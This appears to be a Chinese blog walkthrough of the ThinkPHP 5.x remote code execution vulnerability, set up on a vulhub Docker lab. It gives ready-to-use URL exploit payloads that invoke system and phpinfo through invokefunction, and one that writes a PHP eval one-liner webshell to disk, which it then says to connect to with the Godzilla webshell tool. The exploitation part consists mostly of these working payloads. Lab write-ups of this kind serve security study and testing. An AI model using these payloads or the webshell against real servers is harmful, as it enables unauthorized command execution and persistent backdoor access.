Thinkphp5x远程执行命令及getshell

一.环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:

漏洞利用:

漏洞根本源于 thinkphp/library/think/Request.php 中method⽅法可以进⾏变量覆盖,通 过覆盖类的核⼼属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分 原因,在利⽤上会出现⼀些问题

远程命令执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami

执行完如下图

远程代码执行:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

如下图

写入一句话木马:

POC:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>">>3.php

然后去访问我们的3.php 创建成功

哥斯拉连接:

相关推荐
chushiyunen5 分钟前
dom操作笔记、xml和document等
xml·java·笔记
whisperrr.5 分钟前
【spring01】Spring 管理 Bean-IOC,基于 XML 配置 bean
xml·java·spring
chushiyunen8 分钟前
tomcat使用笔记、启动失败但是未打印日志
java·笔记·tomcat
旧味清欢|12 分钟前
关注分离(Separation of Concerns)在前端开发中的实践演进:从 XMLHttpRequest 到 Fetch API
javascript·http·es6
天上掉下来个程小白14 分钟前
HttpClient-03.入门案例-发送POST方式请求
java·spring·httpclient·苍穹外卖
ModestCoder_24 分钟前
将一个新的机器人模型导入最新版isaacLab进行训练(以unitree H1_2为例)
android·java·机器人
a180079310801 小时前
软件工程面试题(二十二)
java·面试·软件工程
RainbowSea1 小时前
4. RabbitMQ 发布确认的配置详细说明
java·消息队列·rabbitmq
车载小杜1 小时前
基于指针的线程池
开发语言·c++
-代号95271 小时前
【JavaScript】十四、轮播图
javascript·css·css3